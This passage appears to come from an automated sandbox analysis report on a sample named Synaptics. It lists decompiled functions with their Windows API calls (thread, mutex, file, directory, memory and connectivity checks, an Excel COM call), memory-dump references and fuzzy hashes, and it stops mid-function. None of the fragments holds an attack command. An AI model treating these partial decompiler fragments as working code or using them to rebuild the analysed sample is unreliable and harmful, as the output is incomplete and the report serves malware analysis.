                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 21%
                                                                                                                                                                                                                            			E00478230(void* __eax, void* __ecx, void* __edx, void* __ebp) {
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				E004781D4(__eax, __eax, __ecx, _t15, __edx, _t16); // executed
                                                                                                                                                                                                                            				_push(E004065AC(__edx));
                                                                                                                                                                                                                            				_push(E00478268);
                                                                                                                                                                                                                            				_push(5);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push( &_v24); // executed
                                                                                                                                                                                                                            				L00417E04(); // executed
                                                                                                                                                                                                                            				return E004781BC( &_v24, _t15, _t16);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004781D4: 741EBC30.OLE32(00000000,?,00000000,00478221,?,?,Excel.Application,00000000,?,00478242), ref: 00478201
                                                                                                                                                                                                                            • 7426B690.OLE32(00000000,00000000,00000005,00478268,00000000), ref: 00478258
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7426B690
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3899874126-0
                                                                                                                                                                                                                            • Opcode ID: 785669ee39f9c79f4717ff3d995cc01253c4d274ddd2fb4442236d13fad275cd
                                                                                                                                                                                                                            • Instruction ID: f8e174c70090632150d231ab812d8d7e42eb955a1dbdae64a2f8568beb472c63
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 785669ee39f9c79f4717ff3d995cc01253c4d274ddd2fb4442236d13fad275cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFD05B717847102BD600F56D0C47BD7318C8B45729F5445BE7518D72C3FE6D8D1542EA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00498248(void* __eax, void* __ecx) {
                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                            				DWORD* _t8;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *0x49f1dc = E00441704(__eax);
                                                                                                                                                                                                                            				_t4 = CreateThread(0, 0, E00497CF0, 0, 0, _t8); // executed
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                            • Opcode ID: cbb4e7eea467e225b00a60faa0712dba27865e89d4f5a63d4fcb6e00c7bf2234
                                                                                                                                                                                                                            • Instruction ID: d20cfee4eb2c6f302c38dd3c40418a867a3644e10e3952504ee4e450d92dbdcf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbb4e7eea467e225b00a60faa0712dba27865e89d4f5a63d4fcb6e00c7bf2234
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81C08CB03E83007EF610A7A6AD83F2529888344F25F30003BF606ED1C3C8E92C48062C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A58(void* __eax) {
                                                                                                                                                                                                                            				signed char _t5;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                                                                                                                                                                                            				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00496E89,00000000,00496FE6), ref: 00409A63
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = _a12;
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(?,004742AD,004742AC,?,00474274,00000000,000000FF,00000000,00000000,004742AC), ref: 00406FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040991C(void* __eax) {
                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 00409939
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00474D34(void* __ecx) {
                                                                                                                                                                                                                            				long _v4;
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                                                                            				_t4 = InternetGetConnectedState( &_v4, 0); // executed
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				return _t4 + 1;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 00474D41
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConnectedInternetState
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 97057780-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00409F54(void* __eax) {
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				return _t4 + 1;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x00409f61
                                                                                                                                                                                                                            0x00409f69
                                                                                                                                                                                                                            0x00409f6d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00496EA8,00000000,00496FE6), ref: 00409F61
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: socket
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00409BAC(void* __eax) {
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = DeleteFileA(E00404E80(__eax)); // executed
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				return _t4 + 1;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x00409bb7
                                                                                                                                                                                                                            0x00409bbf
                                                                                                                                                                                                                            0x00409bc3

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,0047618D,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C,00000000,00000000,00000000), ref: 00409BB7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045D2F8(signed int __eax, void* __ecx) {
                                                                                                                                                                                                                            				struct _ITEMIDLIST** _t10;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
                                                                                                                                                                                                                            				return  *_t10;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x0045d307
                                                                                                                                                                                                                            0x0045d310

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FolderLocationSpecial
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3328827890-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B90(void* __eax) {
                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t6 = __eax;
                                                                                                                                                                                                                            				_t4 =  *(__eax + 0x14);
                                                                                                                                                                                                                            				if(_t4 != 0xffffffff) {
                                                                                                                                                                                                                            					_t5 = FindClose(_t4); // executed
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t6 + 0x14)) = 0xffffffff;
                                                                                                                                                                                                                            					return _t5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE), ref: 00409B9C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                            • Opcode ID: 42b27bba4422c86fbcf350227eb01d9244553bbe8fd90662c9e60b7e3e21f40e
                                                                                                                                                                                                                            • Instruction ID: dfd6d39c8543c627b79b6cb084a4c3329f7e284b48324a05c8a470c5499769dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42b27bba4422c86fbcf350227eb01d9244553bbe8fd90662c9e60b7e3e21f40e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCC09BB05056004BCB149E7DA9C490736996F053363600755F434EB3D7D739DC614665
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401690(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				intOrPtr* _v32;
                                                                                                                                                                                                                            				intOrPtr* _t24;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t45 =  &_v20;
                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                            				 *_t45 = __edx;
                                                                                                                                                                                                                            				_v28 = 0xffffffff;
                                                                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                                                                            				_t44 = __eax;
                                                                                                                                                                                                                            				_v20 =  *_t45 + __eax;
                                                                                                                                                                                                                            				_t35 =  *0x49e5ec; // 0x653adc
                                                                                                                                                                                                                            				while(_t35 != 0x49e5ec) {
                                                                                                                                                                                                                            					_t42 =  *_t35;
                                                                                                                                                                                                                            					_t43 =  *(_t35 + 8);
                                                                                                                                                                                                                            					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
                                                                                                                                                                                                                            						if(_t43 < _v28) {
                                                                                                                                                                                                                            							_v28 = _t43;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
                                                                                                                                                                                                                            						if(_t31 > _v24) {
                                                                                                                                                                                                                            							_v24 = _t31;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                            							 *0x49e5c8 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E00401498(_t35);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t35 = _t42;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t24 = _v32;
                                                                                                                                                                                                                            				 *_t24 = 0;
                                                                                                                                                                                                                            				if(_v24 != 0) {
                                                                                                                                                                                                                            					 *_v32 = _v28;
                                                                                                                                                                                                                            					_t27 = _v24 - _v28;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                                                                                                                                                                            					return _t27;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004016F4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                            • Opcode ID: bf1da7795f9bbb57c32e3e1b3d6e17fcc49e8937ab2342caafcf9f5fcaa67994
                                                                                                                                                                                                                            • Instruction ID: 869fc0c84a99862be13868ebdbc7f118d1adf1e01b4cb4f2c24919aa0ce3646c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf1da7795f9bbb57c32e3e1b3d6e17fcc49e8937ab2342caafcf9f5fcaa67994
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7221E570608301AFD710DF5AC880A1BBBE5AB85764F14C96AF4989B3A0D334E840CB9A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				void** _v24;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void** _t16;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                                                                                            				 *_t32 = __edx;
                                                                                                                                                                                                                            				_t31 = __eax & 0xfffff000;
                                                                                                                                                                                                                            				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                                                                                                                            				 *_v24 = _t31;
                                                                                                                                                                                                                            				_t15 = _v20 - _t31;
                                                                                                                                                                                                                            				_v24[1] = _t15;
                                                                                                                                                                                                                            				_t29 =  *0x49e5ec; // 0x653adc
                                                                                                                                                                                                                            				while(_t29 != 0x49e5ec) {
                                                                                                                                                                                                                            					_t17 =  *(_t29 + 8);
                                                                                                                                                                                                                            					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                                                                                                                                                                            					if(_t31 > _t17) {
                                                                                                                                                                                                                            						_t17 = _t31;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t27 > _v20) {
                                                                                                                                                                                                                            						_t27 = _v20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t27 > _t17) {
                                                                                                                                                                                                                            						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, "true"); // executed
                                                                                                                                                                                                                            						if(_t15 == 0) {
                                                                                                                                                                                                                            							_t16 = _v24;
                                                                                                                                                                                                                            							 *_t16 = 0;
                                                                                                                                                                                                                            							return _t16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t29 =  *_t29;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t15;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,?), ref: 004017B5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E004017DC(void* __eax, void** __ecx, void* __edx) {
                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                            				intOrPtr* _t19;
                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                            				void** _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				 *_t23 = __eax + 0x00000fff & 0xfffff000;
